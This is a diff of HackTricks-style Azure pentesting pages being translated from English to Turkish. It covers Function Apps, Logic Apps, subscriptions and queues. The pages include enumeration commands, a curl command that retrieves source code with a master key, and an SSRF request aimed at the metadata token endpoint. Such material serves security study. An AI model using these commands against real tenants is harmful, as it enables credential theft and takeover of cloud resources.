## Persistence
## Süreklilik
Same as storage persistence:
Depolama sürekliliği ile aynı:
{{#ref}}
../az-persistence/az-storage-persistence.md
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}

244
src/pentesting-cloud/azure-security/az-services/az-function-apps.md
View File

@@ -2,114 +2,113 @@
{{#include ../../../banners/hacktricks-training.md}}
## Basic Information
## Temel Bilgiler
**Azure Function Apps** are a **serverless compute service** that allow you to run small pieces of code, called **functions**, without managing the underlying infrastructure. They are designed to execute code in response to various triggers, such as **HTTP requests, timers, or events from other Azure services** like Blob Storage or Event Hubs. Function Apps support multiple programming languages, including C#, Python, JavaScript, and Java, making them versatile for building **event-driven applications**, automating workflows, or integrating services. They are cost-effective, as you usually only pay for the compute time used when your code runs.
**Azure Function Apps**, temel altyapıyı yönetmeden **fonksiyon** adı verilen küçük kod parçalarını çalıştırmanıza olanak tanıyan bir **sunucusuz hesaplama hizmetidir**. HTTP istekleri, zamanlayıcılar veya Blob Depolama veya Olay Hub'ları gibi diğer Azure hizmetlerinden gelen olaylar gibi çeşitli tetikleyicilere yanıt olarak kodu çalıştırmak için tasarlanmıştır. Function Apps, C#, Python, JavaScript ve Java dahil olmak üzere birden fazla programlama dilini destekler, bu da onları **olay odaklı uygulamalar**, iş akışlarını otomatikleştirme veya hizmetleri entegre etme için çok yönlü hale getirir. Genellikle kodunuz çalıştığında yalnızca kullanılan hesaplama süresi için ödeme yaptığınız için maliyet açısından etkilidir.
> [!NOTE]
> Note that **Functions are a subset of the App Services**, therefore, a lot of the features discussed here will be used also by applications created as Azure Apps (`webapp` in cli).
> **Fonksiyonlar, Uygulama Hizmetlerinin** bir alt kümesidir, bu nedenle burada tartışılan birçok özellik, Azure Uygulamaları (`webapp` cli'de) olarak oluşturulan uygulamalar tarafından da kullanılacaktır.
### Different Plans
### Farklı Planlar
- **Flex Consumption Plan**: Offers **dynamic, event-driven scaling** with pay-as-you-go pricing, adding or removing function instances based on demand. It supports **virtual networking** and **pre-provisioned instances** to reduce cold starts, making it suitable for **variable workloads** that dont require container support.
- **Traditional Consumption Plan**: The default serverless option, where you **pay only for compute resources when functions run**. It automatically scales based on incoming events and includes **cold start optimizations**, but does not support container deployments. Ideal for **intermittent workloads** requiring automatic scaling.
- **Premium Plan**: Designed for **consistent performance**, with **prewarmed workers** to eliminate cold starts. It offers **extended execution times, virtual networking**, and supports **custom Linux images**, making it perfect for **mission-critical applications** needing high performance and advanced features.
- **Dedicated Plan**: Runs on dedicated virtual machines with **predictable billing** and supports manual or automatic scaling. It allows running multiple apps on the same plan, provides **compute isolation**, and ensures **secure network access** via App Service Environments, making it ideal for **long-running applications** needing consistent resource allocation.
- **Container Apps**: Enables deploying **containerized function apps** in a managed environment, alongside microservices and APIs. It supports custom libraries, legacy app migration, and **GPU processing**, eliminating Kubernetes cluster management. Ideal for **event-driven, scalable containerized applications**.
- **Esnek Tüketim Planı**: Talebe göre fonksiyon örneklerini ekleyip kaldırarak **dinamik, olay odaklı ölçeklendirme** sunar ve kullanım başına ödeme yapar. **Sanal ağ** ve **önceden sağlanmış örnekleri** destekleyerek soğuk başlangıçları azaltır, bu da konteyner desteği gerektirmeyen **değişken iş yükleri** için uygundur.
- **Geleneksel Tüketim Planı**: Fonksiyonlar çalıştığında yalnızca hesaplama kaynakları için **ödeme yaptığınız** varsayılan sunucusuz seçenektir. Gelen olaylara göre otomatik olarak ölçeklenir ve **soğuk başlangıç optimizasyonları** içerir, ancak konteyner dıtımlarını desteklemez. Otomatik ölçeklendirme gerektiren **kesintili iş yükleri** için idealdir.
- **Premium Plan**: **Tutarlı performans** için tasarlanmıştır, soğuk başlangıçları ortadan kaldırmak için **önceden ısıtılmış işçiler** ile birlikte gelir. **Uzun süreli yürütme süreleri, sanal ağ** sunar ve **özel Linux görüntülerini** destekler, bu da yüksek performans ve gelişmiş özellikler gerektiren **misyon kritik uygulamalar** için mükemmeldir.
- **Özel Plan**: **Tahmin edilebilir faturalama** ile özel sanal makinelerde çalışır ve manuel veya otomatik ölçeklendirmeyi destekler. Aynı planda birden fazla uygulama çalıştırmaya olanak tanır, **hesaplama izolasyonu** sağlar ve **App Service Environments** aracılığıyla **güvenli ağ erişimi** sağlar, bu da tutarlı kaynak tahsisi gerektiren **uzun süreli uygulamalar** için idealdir.
- **Konteyner Uygulamaları**: **Konteynerleştirilmiş fonksiyon uygulamalarını** yönetilen bir ortamda, mikro hizmetler ve API'lerle birlikte dağıtmayı sağlar. Özel kütüphaneleri, eski uygulama geçişini ve **GPU işleme** destekler, Kubernetes küme yönetimini ortadan kaldırır. **Olay odaklı, ölçeklenebilir konteynerleştirilmiş uygulamalar** için idealdir.
### **Storage Buckets**
### **Depolama Kovalari**
When creating a new Function App not containerised (but giving the code to run), the **code and other Function related data will be stored in a Storage account**. By default the web console will create a new one per function to store the code.
Yeni bir konteynerleştirilmemiş Function App oluşturduğunuzda (ancak çalıştırılacak kodu veriyorsanız), **kod ve diğer Fonksiyon ile ilgili veriler bir Depolama hesabında saklanacaktır**. Varsayılan olarak, web konsolu her fonksiyon için kodu saklamak üzere yeni bir tane oluşturacaktır.
Moreover, modifying the code inside the bucket (in the different formats it could be stored), the **code of the app will be modified to the new one and executed** next time the Function is called.
Ayrıca, kova içindeki kodu (saklanabileceği farklı formatlarda) değiştirdiğinizde, **uygulamanın kodu yeni olanla değiştirilecek ve bir sonraki fonksiyon çağrıldığında çalıştırılacaktır**.
> [!CAUTION]
> This is very interesting from an attackers perspective as **write access over this bucket** will allow an attacker to **compromise the code and escalate privileges** to the managed identities inside the Function App.
> Bu, bir saldırganın **bu kovaya yazma erişimi** olması durumunda **kodun tehlikeye atılmasına ve Fonksiyon Uygulamasındaki yönetilen kimliklere yetki yükseltmesine** olanak tanıdığı için saldırganlar açısından çok ilginçtir.
>
> More on this in the **privilege escalation section**.
> Bununla ilgili daha fazla bilgi **yetki yükseltme bölümünde**.
It's also possible to find the **master and functions keys** stored in the storage account in the container **`azure-webjobs-secrets`** inside the folder **`<app-name>`** in the JSON files you can find inside.
Ayrıca, depolama hesabında **`azure-webjobs-secrets`** konteynerinde **`<app-name>`** klasöründe saklanan **master ve fonksiyon anahtarlarını** bulmak da mümkündür.
Note that Functions also allow to store the code in a remote location just indicating the URL to it.
Fonksiyonların ayrıca kodu uzaktan bir konumda saklamaya da izin verdiğini unutmayın, sadece URL'yi belirtmek yeterlidir.
### Networking
###
Using a HTTP trigger:
HTTP tetikleyicisi kullanarak:
- It's possible to give **access to a function to from all Internet** without requiring any authentication or give access IAM based. Although its also possible to restrict this access.
- It's also possible to **give or restrict access** to a Function App from **an internal network (VPC)**.
- **Tüm İnternetten bir fonksiyona erişim** vermek mümkündür, herhangi bir kimlik doğrulama gerektirmeden veya IAM tabanlı erişim vermek mümkündür. Ancak bu erişimi kısıtlamak da mümkündür.
- **Bir iç ağdan (VPC)** bir Function App'a **erişim vermek veya kısıtlamak** da mümkündür.
> [!CAUTION]
> This is very interesting from an attackers perspective as it might be possible to **pivot to internal networks** from a vulnerable Function exposed to the Internet.
> Bu, bir saldırganın İnternete açık bir zayıf Fonksiyondan **iç ağlara geçiş yapma** olasılığı olduğu için saldırganlar açısından çok ilginçtir.
### **Function App Settings & Environment Variables**
### **Fonksiyon Uygulama Ayarları ve Ortam Değişkenleri**
It's possible to configure environment variables inside an app, which could contain sensitive information. Moreover, by default the env variables **`AzureWebJobsStorage`** and **`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING`** (among others) are created. These are specially interesting because they **contain the account key to control with FULL permissions the storage account containing the data of the application**. These settings are also needed to execute the code from the Storage Account.
Bir uygulama içinde ortam değişkenlerini yapılandırmak mümkündür; bu değişkenler hassas bilgiler içerebilir. Ayrıca, varsayılan olarak **`AzureWebJobsStorage`** ve **`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING`** (diğerleri arasında) gibi ortam değişkenleri oluşturulur. Bu değişkenler özellikle ilginçtir çünkü **uygulamanın verilerini içeren depolama hesabını kontrol etmek için TAM izinlere sahip hesap anahtarını içerirler**. Bu ayarlar, Depolama Hesabından kodu çalıştırmak için de gereklidir.
These env variables or configuration parameters also controls how the Function execute the code, for example if **`WEBSITE_RUN_FROM_PACKAGE`** exists, it'll indicate the URL where the code of the application is located.
Bu ortam değişkenleri veya yapılandırma parametreleri, Fonksiyonun kodu nasıl çalıştıracağını da kontrol eder; örneğin, **`WEBSITE_RUN_FROM_PACKAGE`** varsa, bu uygulamanın kodunun bulunduğu URL'yi belirtir.
### **Function Sandbox**
### **Fonksiyon Sandbox'ı**
Inside the linux sandbox the source code is located in **`/home/site/wwwroot`** in the file **`function_app.py`** (if python is used) the user running the code is **`app`** (without sudo permissions).
Linux sandbox içinde kaynak kodu **`/home/site/wwwroot`** dizininde **`function_app.py`** dosyasında (Python kullanılıyorsa) bulunur; kodu çalıştıran kullanıcı **`app`**'dir (sudo izinleri olmadan).
In a **Windows** function using NodeJS the code was located in **`C:\home\site\wwwroot\HttpTrigger1\index.js`**, the username was **`mawsFnPlaceholder8_f_v4_node_20_x86`** and was part of the **groups**: `Mandatory Label\High Mandatory Level Label`, `Everyone`, `BUILTIN\Users`, `NT AUTHORITY\INTERACTIVE`, `CONSOLE LOGON`, `NT AUTHORITY\Authenticated Users`, `NT AUTHORITY\This Organization`, `BUILTIN\IIS_IUSRS`, `LOCAL`, `10-30-4-99\Dwas Site Users`.
Bir **Windows** fonksiyonunda NodeJS kullanarak kod **`C:\home\site\wwwroot\HttpTrigger1\index.js`** dizininde bulunuyordu; kullanıcı adı **`mawsFnPlaceholder8_f_v4_node_20_x86`** idi ve **grupların** bir parçasıydı: `Mandatory Label\High Mandatory Level Label`, `Everyone`, `BUILTIN\Users`, `NT AUTHORITY\INTERACTIVE`, `CONSOLE LOGON`, `NT AUTHORITY\Authenticated Users`, `NT AUTHORITY\This Organization`, `BUILTIN\IIS_IUSRS`, `LOCAL`, `10-30-4-99\Dwas Site Users`.
### **Managed Identities & Metadata**
### **Yönetilen Kimlikler ve Meta Veriler**
Just like [**VMs**](vms/), Functions can have **Managed Identities** of 2 types: System assigned and User assigned.
[**VM'ler**](vms/) gibi, Fonksiyonlar da **2 tür Yönetilen Kimlik** alabilir: Sistem atanan ve Kullanıcı atanan.
The **system assigned** one will be a managed identity that **only the function** that has it assigned would be able to use, while the **user assigned** managed identities are managed identities that **any other Azure service will be able to use**.
**Sistem atanan** olan, **yalnızca atanan fonksiyon** tarafından kullanılabilecek bir yönetilen kimliktir; **kullanıcı atanan** yönetilen kimlikler ise **herhangi bir diğer Azure hizmeti tarafından kullanılabilecek** yönetilen kimliklerdir.
> [!NOTE]
> Just like in [**VMs**](vms/), Functions can have **1 system assigned** managed identity and **several user assigned** ones, so it's always important to try to find all of them if you compromise the function because you might be able to escalate privileges to several managed identities from just one Function.
> [**VM'ler**](vms/) gibi, Fonksiyonlar **1 sistem atanan** yönetilen kimlik ve **birkaç kullanıcı atanan** yönetilen kimlik alabilir, bu nedenle fonksiyonu tehlikeye attığınızda hepsini bulmaya çalışmak her zaman önemlidir çünkü yalnızca bir Fonksiyondan birkaç yönetilen kimliğe yetki yükseltebilirsiniz.
>
> If a no system managed identity is used but one or more user managed identities are attached to a function, by default you wont be able to get any token.
> Eğer bir sistem yönetilen kimliği kullanılmıyorsa ancak bir veya daha fazla kullanıcı yönetilen kimliği bir fonksiyona eklenmişse, varsayılan olarak herhangi bir token alamazsınız.
It's possible to use the [**PEASS scripts**](https://github.com/peass-ng/PEASS-ng) to get tokens from the default managed identity from the metadata endpoint. Or you could get them **manually** as explained in:
[**PEASS scriptlerini**](https://github.com/peass-ng/PEASS-ng) kullanarak meta veri uç noktasından varsayılan yönetilen kimlikten token alabilirsiniz. Ya da bunları **manuel olarak** alabilirsiniz, açıklamalar için:
{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#azure-vm" %}
Note that you need to find out a way to **check all the Managed Identities a function has attached** as if you don't indicate it, the metadata endpoint will **only use the default one** (check the previous link for more info).
Bir fonksiyonun ekli olduğu **tüm Yönetilen Kimlikleri kontrol etmenin** bir yolunu bulmanız gerektiğini unutmayın; çünkü belirtmezseniz, meta veri uç noktası **yalnızca varsayılan olanı** kullanacaktır (daha fazla bilgi için önceki bağlantıya bakın).
## Access Keys
## Erişim Anahtarları
> [!NOTE]
> Note that there aren't RBAC permissions to give access to users to invoke the functions. The **function invocation depends on the trigger** selected when it was created and if a HTTP Trigger was selected, it might be needed to use an **access key**.
> Kullanıcılara fonksiyonları çağırma erişimi vermek için RBAC izinleri yoktur. **Fonksiyon çağrısı, oluşturulurken seçilen tetikleyiciye** bağlıdır ve bir HTTP Tetikleyici seçildiyse, bir **erişim anahtarı** kullanmanız gerekebilir.
When creating an endpoint inside a function using a **HTTP trigger** it's possible to indicate the **access key authorization level** needed to trigger the function. Three options are available:
Bir fonksiyon içinde **HTTP tetikleyici** kullanarak bir uç nokta oluşturduğunuzda, fonksiyonu tetiklemek için gereken **erişim anahtarı yetkilendirme seviyesini** belirtmek mümkündür. Üç seçenek mevcuttur:
- **ANONYMOUS**: **Everyone** can access the function by the URL.
- **FUNCTION**: Endpoint is only accessible to users using a **function, host or master key**.
- **ADMIN**: Endpoint is only accessible to users a **master key**.
- **ANONYMOUS**: **Herkes**, URL aracılığıyla fonksiyona erişebilir.
- **FUNCTION**: Uç nokta yalnızca **fonksiyon, ana bilgisayar veya master anahtar** kullanan kullanıcılara açıktır.
- **ADMIN**: Uç nokta yalnızca **master anahtar** kullanan kullanıcılara açıktır.
**Type of keys:**
**Anahtar türleri:**
- **Function Keys:** Function keys can be either default or user-defined and are designed to grant access exclusively to **specific function endpoints** within a Function App allowing a more fine-grained access over the endpoints.
- **Host Keys:** Host keys, which can also be default or user-defined, provide access to **all function endpoints within a Function App with FUNCTION access level**.
- **Master Key:** The master key (`_master`) serves as an administrative key that offers elevated permissions, including access to all function endpoints (ADMIN access lelvel included). This **key cannot be revoked.**
- **System Keys:** System keys are **managed by specific extensions** and are required for accessing webhook endpoints used by internal components. Examples include the Event Grid trigger and Durable Functions, which utilize system keys to securely interact with their respective APIs.
- **Fonksiyon Anahtarları:** Fonksiyon anahtarları varsayılan veya kullanıcı tanımlı olabilir ve yalnızca bir Function App içindeki **belirli fonksiyon uç noktalarına** erişim sağlamak için tasarlanmıştır, bu da uç noktalar üzerinde daha ince ayarlı bir erişim sağlar.
- **Ana Bilgisayar Anahtarları:** Ana bilgisayar anahtarları, varsayılan veya kullanıcı tanımlı olabilir ve **FUNCTION erişim seviyesine sahip bir Function App içindeki tüm fonksiyon uç noktalarına** erişim sağlar.
- **Master Anahtar:** Master anahtar (`_master`), tüm fonksiyon uç noktalarına (ADMIN erişim seviyesi dahil) erişim sağlayan yükseltilmiş izinler sunan bir yönetim anahtarıdır. Bu **anahtar iptal edilemez.**
- **Sistem Anahtarları:** Sistem anahtarları, **belirli uzantılar tarafından yönetilir** ve iç bileşenler tarafından kullanılan webhook uç noktalarına erişim için gereklidir. Örnekler arasında, sistem anahtarlarını kullanarak API'leri güvenli bir şekilde etkileşimde bulunan Olay Grid tetikleyicisi ve Dayanıklı Fonksiyonlar bulunur.
> [!TIP]
> Example to access a function API endpoint using a key:
> Bir anahtar kullanarak bir fonksiyon API uç noktasına erişim örneği:
>
> `https://<function_uniq_name>.azurewebsites.net/api/<endpoint_name>?code=<access_key>`
### Basic Authentication
### Temel Kimlik Doğrulama
Just like in App Services, Functions also support basic authentication to connect to **SCM** and **FTP** to deploy code using a **username and password in a URL** provided by Azure. More information about it in:
Uygulama Hizmetlerinde olduğu gibi, Fonksiyonlar da **SCM** ve **FTP** ile bağlanmak için temel kimlik doğrulamayı destekler; bu, Azure tarafından sağlanan bir **kullanıcı adı ve şifre ile URL** kullanarak kod dağıtımına olanak tanır. Bununla ilgili daha fazla bilgi:
{{#ref}}
az-app-service.md
{{#endref}}
### Github Based Deployments
### Github Tabanlı Dağıtımlar
When a function is generated from a Github repo Azure web console allows to **automatically create a Github Workflow in a specific repository** so whenever this repository is updated the code of the function is updated. Actually the Github Action yaml for a python function looks like this:
Bir fonksiyon bir Github deposundan oluşturulduğunda, Azure web konsolu, bu depo güncellendiğinde fonksiyonun kodunun güncellenmesi için **belirli bir depoda otomatik olarak bir Github İş Akışı oluşturmayı** sağlar. Aslında, bir Python fonksiyonu için Github Action yaml'ı şöyle görünür:
<details>
<summary>Github Action Yaml</summary>
```yaml
# Docs for the Azure Web Apps Deploy action: https://github.com/azure/functions-action
# More GitHub Actions for Azure: https://github.com/Azure/actions
@@ -118,95 +117,93 @@ When a function is generated from a Github repo Azure web console allows to **au
name: Build and deploy Python project to Azure Function App - funcGithub
on:
push:
branches:
- main
workflow_dispatch:
push:
branches:
- main
workflow_dispatch:
env:
AZURE_FUNCTIONAPP_PACKAGE_PATH: "." # set this to the path to your web app project, defaults to the repository root
PYTHON_VERSION: "3.11" # set this to the python version to use (supports 3.6, 3.7, 3.8)
AZURE_FUNCTIONAPP_PACKAGE_PATH: "." # set this to the path to your web app project, defaults to the repository root
PYTHON_VERSION: "3.11" # set this to the python version to use (supports 3.6, 3.7, 3.8)
jobs:
build:
runs-on: ubuntu-latest
steps:
- name: Checkout repository
uses: actions/checkout@v4
build:
runs-on: ubuntu-latest
steps:
- name: Checkout repository
uses: actions/checkout@v4
- name: Setup Python version
uses: actions/setup-python@v5
with:
python-version: ${{ env.PYTHON_VERSION }}
- name: Setup Python version
uses: actions/setup-python@v5
with:
python-version: ${{ env.PYTHON_VERSION }}
- name: Create and start virtual environment
run: |
python -m venv venv
source venv/bin/activate
- name: Create and start virtual environment
run: |
python -m venv venv
source venv/bin/activate
- name: Install dependencies
run: pip install -r requirements.txt
- name: Install dependencies
run: pip install -r requirements.txt
# Optional: Add step to run tests here
# Optional: Add step to run tests here
- name: Zip artifact for deployment
run: zip release.zip ./* -r
- name: Zip artifact for deployment
run: zip release.zip ./* -r
- name: Upload artifact for deployment job
uses: actions/upload-artifact@v4
with:
name: python-app
path: |
release.zip
!venv/
- name: Upload artifact for deployment job
uses: actions/upload-artifact@v4
with:
name: python-app
path: |
release.zip
!venv/
deploy:
runs-on: ubuntu-latest
needs: build
deploy:
runs-on: ubuntu-latest
needs: build
permissions:
id-token: write #This is required for requesting the JWT
permissions:
id-token: write #This is required for requesting the JWT
steps:
- name: Download artifact from build job
uses: actions/download-artifact@v4
with:
name: python-app
steps:
- name: Download artifact from build job
uses: actions/download-artifact@v4
with:
name: python-app
- name: Unzip artifact for deployment
run: unzip release.zip
- name: Unzip artifact for deployment
run: unzip release.zip
- name: Login to Azure
uses: azure/login@v2
with:
client-id: ${{ secrets.AZUREAPPSERVICE_CLIENTID_6C3396368D954957BC58E4C788D37FD1 }}
tenant-id: ${{ secrets.AZUREAPPSERVICE_TENANTID_7E50AEF6222E4C3DA9272D27FB169CCD }}
subscription-id: ${{ secrets.AZUREAPPSERVICE_SUBSCRIPTIONID_905358F484A74277BDC20978459F26F4 }}
- name: Login to Azure
uses: azure/login@v2
with:
client-id: ${{ secrets.AZUREAPPSERVICE_CLIENTID_6C3396368D954957BC58E4C788D37FD1 }}
tenant-id: ${{ secrets.AZUREAPPSERVICE_TENANTID_7E50AEF6222E4C3DA9272D27FB169CCD }}
subscription-id: ${{ secrets.AZUREAPPSERVICE_SUBSCRIPTIONID_905358F484A74277BDC20978459F26F4 }}
- name: "Deploy to Azure Functions"
uses: Azure/functions-action@v1
id: deploy-to-function
with:
app-name: "funcGithub"
slot-name: "Production"
package: ${{ env.AZURE_FUNCTIONAPP_PACKAGE_PATH }}
- name: "Deploy to Azure Functions"
uses: Azure/functions-action@v1
id: deploy-to-function
with:
app-name: "funcGithub"
slot-name: "Production"
package: ${{ env.AZURE_FUNCTIONAPP_PACKAGE_PATH }}
```
</details>
Moreover, a **Managed Identity** is also created so the Github Action from the repository will be able to login into Azure with it. This is done by generating a Federated credential over the **Managed Identity** allowing the **Issuer** `https://token.actions.githubusercontent.com` and the **Subject Identifier** `repo:<org-name>/<repo-name>:ref:refs/heads/<branch-name>`.
Ayrıca, bir **Managed Identity** oluşturulur, böylece depodaki Github Action Azure'a bu kimlik ile giriş yapabilir. Bu, **Managed Identity** üzerinde bir Federated kimlik bilgisi oluşturarak yapılır ve **Issuer** `https://token.actions.githubusercontent.com` ile **Subject Identifier** `repo:<org-name>/<repo-name>:ref:refs/heads/<branch-name>` kullanılır.
> [!CAUTION]
> Therefore, anyone compromising that repo will be able to compromise the function and the Managed Identities attached to it.
> Bu nedenle, o depoyu ele geçiren herkes, işlevi ve ona bağlı Managed Identities'i ele geçirebilir.
### Container Based Deployments
### Konteyner Tabanlı Dağıtımlar
Not all the plans allow to deploy containers, but for the ones that do, the configuration will contain the URL of the container. In the API the **`linuxFxVersion`** setting will ha something like: `DOCKER|mcr.microsoft.com/...`, while in the web console, the configuration will show the **image settings**.
Tüm planlar konteyner dağıtımına izin vermez, ancak izin verenler için yapılandırma konteynerin URL'sini içerecektir. API'de **`linuxFxVersion`** ayarı şöyle bir şey içerecektir: `DOCKER|mcr.microsoft.com/...`, web konsolunda ise yapılandırma **görüntü ayarlarını** gösterecektir.
Moreover, **no source code will be stored in the storage** account related to the function as it's not needed.
Ayrıca, **kaynak kodu depolama** hesabında saklanmayacaktır, çünkü bu gerekli değildir.
## Enumeration
```bash
# List all the functions
az functionapp list
@@ -218,15 +215,15 @@ az functionapp show --name <app-name> --resource-group <res-group>
# Get details about the source of the function code
az functionapp deployment source show \
--name <app-name> \
--resource-group <res-group>
--name <app-name> \
--resource-group <res-group>
## If error like "This is currently not supported."
## Then, this is probalby using a container
# Get more info if a container is being used
az functionapp config container show \
--name <name> \
--resource-group <res-group>
--name <name> \
--resource-group <res-group>
# Get settings (and privesc to the sorage account)
az functionapp config appsettings list --name <app-name> --resource-group <res-group>
@@ -242,7 +239,7 @@ az functionapp config access-restriction show --name <app-name> --resource-group
# Get more info about a function (invoke_url_template is the URL to invoke and script_href allows to see the code)
az rest --method GET \
--url "https://management.azure.com/subscriptions/<subscription>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/functions?api-version=2024-04-01"
--url "https://management.azure.com/subscriptions/<subscription>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/functions?api-version=2024-04-01"
# Get source code with Master Key of the function
curl "<script_href>?code=<master-key>"
@@ -252,19 +249,14 @@ curl "https://newfuncttest123.azurewebsites.net/admin/vfs/home/site/wwwroot/func
# Get source code
az rest --url "https://management.azure.com/<subscription>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/hostruntime/admin/vfs/function_app.py?relativePath=1&api-version=2022-03-01"
```
## Privilege Escalation
## Yetki Yükseltme
{{#ref}}
../az-privilege-escalation/az-functions-app-privesc.md
{{#endref}}
## References
## Referanslar
- [https://learn.microsoft.com/en-us/azure/azure-functions/functions-openapi-definition](https://learn.microsoft.com/en-us/azure/azure-functions/functions-openapi-definition)
{{#include ../../../banners/hacktricks-training.md}}

34
src/pentesting-cloud/azure-security/az-services/az-logic-apps.md
View File

@@ -2,41 +2,38 @@
{{#include ../../../banners/hacktricks-training.md}}
## Basic Information
## Temel Bilgiler
Azure Logic Apps is a cloud-based service provided by Microsoft Azure that enables developers to **create and run workflows that integrate various services**, data sources, and applications. These workflows are designed to **automate business processes**, orchestrate tasks, and perform data integrations across different platforms.
Azure Logic Apps, Microsoft Azure tarafından sağlanan bulut tabanlı bir hizmettir ve geliştiricilerin **çeşitli hizmetleri, veri kaynaklarını ve uygulamaları entegre eden iş akışları oluşturup çalıştırmalarını** sağlar. Bu iş akışları, **iş süreçlerini otomatikleştirmek**, görevleri düzenlemek ve farklı platformlar arasında veri entegrasyonları gerçekleştirmek için tasarlanmıştır.
Logic Apps provides a visual designer to create workflows with a **wide range of pre-built connectors**, which makes it easy to connect to and interact with various services, such as Office 365, Dynamics CRM, Salesforce, and many others. You can also create custom connectors for your specific needs.
Logic Apps, **önceden oluşturulmuş geniş bir bağlantı noktası yelpazesi** ile iş akışları oluşturmak için görsel bir tasarımcı sunar; bu da Office 365, Dynamics CRM, Salesforce ve daha birçok hizmetle kolayca bağlantı kurmayı ve etkileşimde bulunmayı sağlar. Ayrıca, özel ihtiyaçlarınız için özel bağlantı noktaları da oluşturabilirsiniz.
### Examples
### Örnekler
- **Automating Data Pipelines**: Logic Apps can automate **data transfer and transformation processes** in combination with Azure Data Factory. This is useful for creating scalable and reliable data pipelines that move and transform data between various data stores, like Azure SQL Database and Azure Blob Storage, aiding in analytics and business intelligence operations.
- **Integrating with Azure Functions**: Logic Apps can work alongside Azure Functions to develop **sophisticated, event-driven applications that scale as needed** and integrate seamlessly with other Azure services. An example use case is using a Logic App to trigger an Azure Function in response to certain events, such as changes in an Azure Storage account, allowing for dynamic data processing.
- **Veri Boru Hatlarını Otomatikleştirme**: Logic Apps, Azure Data Factory ile birlikte **veri transferi ve dönüşüm süreçlerini** otomatikleştirebilir. Bu, Azure SQL Database ve Azure Blob Storage gibi çeşitli veri depoları arasında veri taşıyan ve dönüştüren ölçeklenebilir ve güvenilir veri boru hatları oluşturmak için faydalıdır; bu da analitik ve iş zekası operasyonlarına yardımcı olur.
- **Azure Functions ile Entegrasyon**: Logic Apps, gerektiğinde ölçeklenen **sofistike, olay odaklı uygulamalar geliştirmek** için Azure Functions ile birlikte çalışabilir ve diğer Azure hizmetleriyle sorunsuz bir şekilde entegre olabilir. Bir örnek kullanım durumu, belirli olaylara yanıt olarak bir Azure Function'ı tetiklemek için bir Logic App kullanmaktır; örneğin, bir Azure Storage hesabındaki değişiklikler, dinamik veri işleme imkanı sağlar.
### Visualize a LogicAPP
### Bir LogicAPP'ı Görselleştirme
It's possible to view a LogicApp with graphics:
Bir LogicApp'ı grafiklerle görüntülemek mümkündür:
<figure><img src="../../../images/image (197).png" alt=""><figcaption></figcaption></figure>
or to check the code in the "**Logic app code view**" section.
veya "**Logic app kod görünümü**" bölümünde kodu kontrol edebilirsiniz.
### SSRF Protection
### SSRF Koruması
Even if you find the **Logic App vulnerable to SSRF**, you won't be able to access the credentials from the metadata as Logic Apps doesn't allow that.
For example, something like this won't return the token:
**Logic App'in SSRF'ye karşı savunmasız olduğunu bulsanız bile**, Logic Apps bunu izin vermediği için metadata'dan kimlik bilgilerine erişemezsiniz.
Örneğin, bu gibi bir şey token'ı döndürmeyecektir:
```bash
# The URL belongs to a Logic App vulenrable to SSRF
curl -XPOST 'https://prod-44.westus.logic.azure.com:443/workflows/2d8de4be6e974123adf0b98159966644/triggers/manual/paths/invoke?api-version=2016-10-01&sp=%2Ftriggers%2Fmanual%2Frun&sv=1.0&sig=_8_oqqsCXc0u2c7hNjtSZmT0uM4Xi3hktw6Uze0O34s' -d '{"url": "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"}' -H "Content-type: application/json" -v
```
### Enumeration
{{#tabs }}
{{#tab name="az cli" }}
```bash
# List
az logic workflow list --resource-group <ResourceGroupName> --subscription <SubscriptionID> --output table
@@ -47,11 +44,9 @@ az logic workflow definition show --name <LogicAppName> --resource-group <Resour
# Get service ppal used
az logic workflow identity show --name <LogicAppName> --resource-group <ResourceGroupName> --subscription <SubscriptionID>
```
{{#endtab }}
{{#tab name="Az PowerSHell" }}
```powershell
# List
Get-AzLogicApp -ResourceGroupName <ResourceGroupName>
@@ -62,12 +57,7 @@ Get-AzLogicApp -ResourceGroupName <ResourceGroupName> -Name <LogicAppName>
# Get service ppal used
(Get-AzLogicApp -ResourceGroupName <ResourceGroupName> -Name <LogicAppName>).Identity
```
{{#endtab }}
{{#endtabs }}
{{#include ../../../banners/hacktricks-training.md}}

30
src/pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.md
View File

@@ -1,60 +1,50 @@
# Az - Management Groups, Subscriptions & Resource Groups
# Az - Yönetim Grupları, Abonelikler ve Kaynak Grupları
{{#include ../../../banners/hacktricks-training.md}}
## Management Groups
## Yönetim Grupları
You can find more info about Management Groups in:
Yönetim Grupları hakkında daha fazla bilgi bulabilirsiniz:
{{#ref}}
../az-basic-information/
{{#endref}}
### Enumeration
### Sayım
```bash
# List
az account management-group list
# Get details and management groups and subscriptions that are children
az account management-group show --name <name> --expand --recurse
```
## Abonelikler
## Subscriptions
You can find more info about Subscriptions in:
Abonelikler hakkında daha fazla bilgi bulabilirsiniz:
{{#ref}}
../az-basic-information/
{{#endref}}
### Enumeration
### Sayım
```bash
# List all subscriptions
az account list --output table
# Get details
az account management-group subscription show --name <management group> --subscription <subscription>
```
## Resource Grupları
## Resource Groups
You can find more info about Resource Groups in:
Resource Grupları hakkında daha fazla bilgi bulabilirsiniz:
{{#ref}}
../az-basic-information/
{{#endref}}
### Enumeration
### Sayım
```bash
# List all resource groups
az group list
# Get resource groups of specific subscription
az group list --subscription "<subscription>" --output table
```
{{#include ../../../banners/hacktricks-training.md}}

20
src/pentesting-cloud/azure-security/az-services/az-queue-enum.md
View File

@@ -2,15 +2,14 @@
{{#include ../../../banners/hacktricks-training.md}}
## Basic Information
## Temel Bilgiler
Azure Queue Storage is a service in Microsoft's Azure cloud platform designed for message queuing between application components, **enabling asynchronous communication and decoupling**. It allows you to store an unlimited number of messages, each up to 64 KB in size, and supports operations such as creating and deleting queues, adding, retrieving, updating, and deleting messages, as well as managing metadata and access policies. While it typically processes messages in a first-in-first-out (FIFO) manner, strict FIFO is not guaranteed.
